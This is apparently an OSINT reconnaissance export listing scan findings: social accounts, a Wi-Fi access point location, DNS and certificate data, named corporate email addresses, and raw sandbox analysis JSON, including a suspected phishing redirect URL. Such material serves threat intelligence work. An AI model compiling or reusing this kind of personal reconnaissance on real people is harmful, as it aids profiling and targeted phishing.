8-bit/color RGB non-interlaced" and extension "png"\n "greenCarpet_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 1500x625 components 3" and extension "jpg"\n "Currys-LTIMindtree-Digital-Transformation-Partner-HHB_1_.png" has type "PNG image data 1500 x 625 8-bit/color RGBA non-interlaced" and extension "png"\n "LTIMindtree_Linear_2-1_L_T_Blue_1_.jpg" has type "JPEG image data JFIF standard 1.02 resolution (DPI) density 300x300 segment length 16 baseline precision 8 1070x302 components 3" and extension "jpg"\n "strength-gradient_1_.png" has type "PNG image data 640 x 1452 8-bit colormap non-interlaced" and extension "png"\n "Home-Page-Newsroom-Investors-Careers-Desktop-Investors-1_1_.png" has type "PNG image data 351 x 467 8-bit colormap non-interlaced" and extension "png"\n "IoT-Evolution-Award-2022_1_.png" has type "PNG image data 340 x 270 8-bit/color RGB non-interlaced" and extension "png"\n "Home-Page-Newsroom-Investors-Careers-Desktop-Careers-2_1_.png" has type "PNG image data 351 x 467 8-bit colormap non-interlaced" and extension "png"\n "Home-Page-Newsroom-Investors-Careers-Desktop-Newsroom-1_1_.png" has type "PNG image data 351 x 467 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1560', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1560', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002992]\n "Cab2627.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2627.tmp]- [targetUID: 00000000-00002992]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id' | 185.199.108.153 |
| 2023-05-12 03:19:47 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pinterest (Category: social)
https://www.pinterest.com/patrickpogoda/ | patrickpogoda |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:01:71:0A:07:07) | 52.3759, 4.8975 |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 2 | 0 | 2 | 0 | None | eliaspinheironeto.github.io | 185.199.111.153 |
| 2023-05-12 03:09:49 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 77.170.74.34.bc.googleusercontent.com | 34.74.170.77 |
| 2023-05-12 02:59:15 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'34.74.170.74', u'104.18.33.171'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://www.thrivelearning.com/privacy-policy', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar13B.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"\n "184.31.135.120:80"\n "142.251.46.206:443"\n "172.67.40.155:443"\n "142.250.72.195:80"\n "172.217.164.104:443"\n "142.251.46.206:80"\n "142.251.32.46:443"\n "142.251.46.226:443"\n "104.17.213.204:443"\n "99.84.37.81:443"\n "104.17.131.171:443"\n "104.18.33.171:443"\n "104.17.67.176:443"\n "104.17.239.204:443"\n "104.17.234.204:443"\n "143.204.141.155:80"\n "142.250.191.34:443"\n "74.125.137.154:443"\n "143.204.146.22:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"x1.c.lencr.org"\n "ocsp.pki.goog"\n "crl.pki.goog"\n "crls.pki.goog"\n "o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "crl.rootg2.amazontrust.com"\n "crl.rootca1.amazontrust.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_fac_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_fac_IE_EarlyTabStart_0xb88_Mutex"\n "UpdatingNewTabPageData"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_fac_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4012"\n "IsoScope_fac_IESQMMUTEX_0_331"\n "IsoScope_fac_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_fac_ConnHashTable<4012>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_fac_IE_EarlyTabStart_0xb88_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_fac_IESQMMUTEX_0_303"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab13A.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"E87CE99F124623F95572A696C80EFCAF_7F9CD1EAD79E5E81389FF041C7CC4C83" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\E87CE99F124623F95572A696C80EFCAF_7F9CD1EAD79E5E81389FF041C7CC4C83]- [targetUID: 00000000-00004092]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00004092]\n "A16C6C16D94F76E0808C087DFC657D99_FC91738673A16FF86D4BA590A2DAB458" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\A16C6C16D94F76E0808C087DFC657D99_FC91738673A16FF86D4BA590A2DAB458]- [targetUID: 00000000-00004092]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00004092]\n "~DFCDE83B0A453A9EBF.TMP" has type "data"- Location: [%TEMP%\\~DFCDE83B0A453A9EBF.TMP]- [targetUID: 00000000-00004012]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00004092]\n "GA27FS9J.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GA27FS9J.txt]- [targetUID: 00000000-00004092]\n "CSO8KKZN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CSO8KKZN.txt]- [targetUID: 00000000-00004012]\n "6DB145CFEEC544B1582FED1ADA3370DD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6DB145CFEEC544B1582FED1ADA3370DD]- [targetUID: 00000000-00004092]\n "69C6F6EC64E114822DF688DC12CDD86C" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\69C6F6EC64E114822DF688DC12CDD86C]- [targetUID: 00000000-00004092]\n "Cab13A.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\Cab13A.tmp]- [targetUID: 00000000-00004092]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00004092]\n "620BEF1064BD8E252C599957B3C91896" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\620BEF1064BD8E252C599957B3C91896]- [targetUID: 00000000-00004092]\n "6180SSX0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6180SSX0.txt]- [targetUID: 00000000-00004092]\n "GCLPDFB0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GCLPDFB0.txt]- [targetUID: 00000000-00004012]\n "VRCWGUFK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VRCWGUFK.txt]- [targetUID: 00000000-00004092]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00004012]\n "NXW30O92.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NXW30O92.txt]- [targetUID: 00000000-00004012]\n "6KIE135F.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6KIE135F.txt]- [targetUID: 00000000-00004012]\n "U6NFCC50.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\U6NFCC50.txt]- [targetUID: 00000000-00004012]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"HTTP/1.1 200 OK\nContent-Length: 281\nContent-Type: application/json; charset=utf-8\nServer: Microsoft-HTTPAPI/2.0\nX-CMS-SearchElapsedTimeInMilliseconds: 10\nX-CMS-SearchBackendTimeInMilliseconds: 6\nX-CMS-SearchMatchedTotal: 1\nX-CMS-SearchMaxScore: 0\nX-CMS-SearchShardsTotal: 80\nX-CMS-SearchShardsSuccessful: 80\nX-CMS-SearchShardsFailed: 0\nX-CMS-SearchReturnedCount: 1\nX-CMS-DocumentStorageTier: Cache\nEdge-control: max-age=900s,downstream-ttl=900s\nX-CMS-ExecutionTimeInMilliseconds: 3\nAppEx-Activity-Id: 11ec2d32-6770-4750-a98d-dc60dcd1f5e5\nX-Trace-Context: {"ActivityId":"11ec2d32-6770-4750-a98d-dc60dcd1f5e5"}\nMS-CV: UaAmJ1CqSECp3hXSggbhQA.0\nX-CMS-ServiceLocation: westus:0\nDate: Mon, 25 Jul 2022 17:07:38 GMT\n\n[{"list":[{"link":{"href":"goldbartext","title":""}},{"link":{"href":"okBtnText","title":""}},{"link":{"href":"cancelBtnText","title":""}},{"link":{"href":"intervalInDays","title":"20"}},{"link":{"href":"repeat","title":"1"}},{"link":{"href":"version","title":"3"}}],"_score":0.0}]"- [Source: SSL_52.155.62.95]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.thrivelearning.com/privacy-policy"- [Source: Input]\n Pattern match: "https://www.thrivelearning.com"- [Source: Input]\n Heuristic match: "x1.c.lencr.org"- [Source: PCAP]\n Heuristic match: "GET / HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: x1.c.lencr.org"- [Source: PCAP]\n Heuristic match: "o.ss2.us"- [Source: PCAP]\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"- [Source: PCAP]\n Heuristic match: "ocsp.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D | 34.74.170.74 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | webmail.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
26:b6:b9:a7:2f:e5:4c:52:ac:47:f6:61:c0:02:b0:ef:8e:c3:
a6:d3:f1:ec:92:c0:a2:e1:7b:19:b2:3a:4e:87:84:15:a6:4c:
8a:85:bd:36:13:13:c4:da:73:35:49:ef:cb:b3:e1:6a:f3:e3:
6a:cd:e3:23:e6:23:db:2a:e9:31:93:fb:15:36:e7:dc:5c:fa:
c4:54:cb:5a:6a:98:38:29:87:fa:da:f5:13:2c:eb:21:a6:ca:
f5:a7:ff:b2:8b:c4:dc:75:27:1e:79:9e:da:a2:ef:91:70:58:
b0:db:99:37:98:c0:d2:e2:54:58:cd:4b:38:9f:64:cd:b8:28:
b3:53:a2:f7:25:f8:e5:6e:f5:cc:14:4f:d5:0c:26:d1:5d:4e:
26:51:28:7f:b6:23:ed:bf:75:93:69:22:6c:68:43:cc:6d:a2:
d1:16:79:71:e0:05:8c:5a:b0:10:74:43:19:6e:9b:04:0e:8c:
40:57:7c:d4:5f:a9:81:06:c7:26:a0:f5:3e:b1:df:d4:c4:1a:
2d:cd:6c:a6:e8:75:2e:d8:c6:69:39:72:bd:2b:3f:43:f8:67:
8b:9a:da:b6:90:6f:99:25:70:bc:1f:f3:ed:e2:ac:a1:e9:99:
1f:bc:90:9b:26:e4:c0:04:b6:b2:ea:2c:58:3b:a1:0e:f3:0c:
4e:9f:6c:9d
|
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.198): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:59:54 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | astehnkuhl@generalatlantic.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://generalatlantic.com/astehnkuhl@generalatlantic.com%20https://site.php', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fgeneralatlantic.com%2Fastehnkuhl%40generalatlantic.com%20https%3A%2F%2Fllink.to%2F%3Fu%3Dhttps%3A%2F%2Fdev.protektnet.com%2FMNU%2Fgeneralatlantic.com%2Fjdenig%40generalatlantic.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_3f4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_3f4_IE_EarlyTabStart_0xe18_Mutex"\n "IsoScope_3f4_IESQMMUTEX_0_331"\n "IsoScope_3f4_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_3f4_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1012"\n "IsoScope_3f4_ConnHashTable<1012>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1012"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "172.66.43.150:443"\n "104.21.16.120:443"\n "35.186.254.174:443"\n "104.18.11.207:443"\n "172.67.71.45:443"\n "142.251.32.35:443"\n "172.217.12.99:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"1000logos.net"\n "api.salesflare.com"\n "stackpath.bootstrapcdn.com"\n "track.salesflare.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2019 Twitter, Inc." (Indicator: "twitter")\n "<a href="https://plus.google.com/107971784894043504000/" onclick="window.open(this.href);return false;"><i class="fa fa-google-plus"></i></a>" (Indicator: "plus.google.com")\n "<a href="https://twitter.com/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-twitter"></i></a>" (Indicator: "twitter")\n "<a href="https://www.facebook.com/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-facebook"></i></a>" (Indicator: "facebook.com")\n "<a href="https://www.linkedin.com/company/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-linkedin"></i></a>" (Indicator: "linkedin.com")\n "<a href="https://www.youtube.com/user/nexcessnet" onclick="window.open(this.href);return false;"><i class="fa fa-youtube"></i></a>" (Indicator: "youtube")\n "<p>Congrats on launching your new Website! Spread the good news: <a href="https://twitter.com/share" class="twitter-share-button" data-text="Just launched my new website with @Nexcess!" data-count="none">Tweet</a></p>" (Indicator: "twitter")\n "<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?\'http\':\'https\';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+\'://platform.twitter.com/widgets.js\';fjs.parentNode.insertBefore(js,fjs);}}(document, \'script\', \'twitter-wjs\');</script>" (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar102F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1041.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab102E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1040.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "GJU2ZIBE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GJU2ZIBE.txt]- [targetUID: 00000000-00001012]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002472]\n "recaptcha__en_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "www.google_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "styles__ltr_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DF50FE3D0FF9FC6B92.TMP" has type "data"- Location: [%TEMP%\\~DF50FE3D0FF9FC6B92.TMP]- [targetUID: 00000000-00001012]\n "_5CF2F181-C1A8-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._52546023-C1A8-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "site_1_.htm" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me"- [targetUID: N/A]\n "FTU5WTPF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FTU5WTPF.txt]- [targetUID: 00000000-00001012]\n "KFOmCnqEu92Fr1Mu4mxP_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.RobotoRegularVersion 2.137; 2017Roboto-Regularht"- [targetUID: N/A]\n "llink_1_.htm" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "_A79A7ACA-C1A9-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "5EL6UQQZ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5EL6UQQZ.txt]- [targetUID: 00000000-00002472]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-169', u'name': u'Found mail related domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed email domain:"!1,w)})},u).prototype.cr=function(){},u.prototype.xy=function(){this.mx.g().focus()},u.prototype.tt=function(w,z,u,r,e,z,y){return(r=((z=new a_((e=["api","payload",(u=void 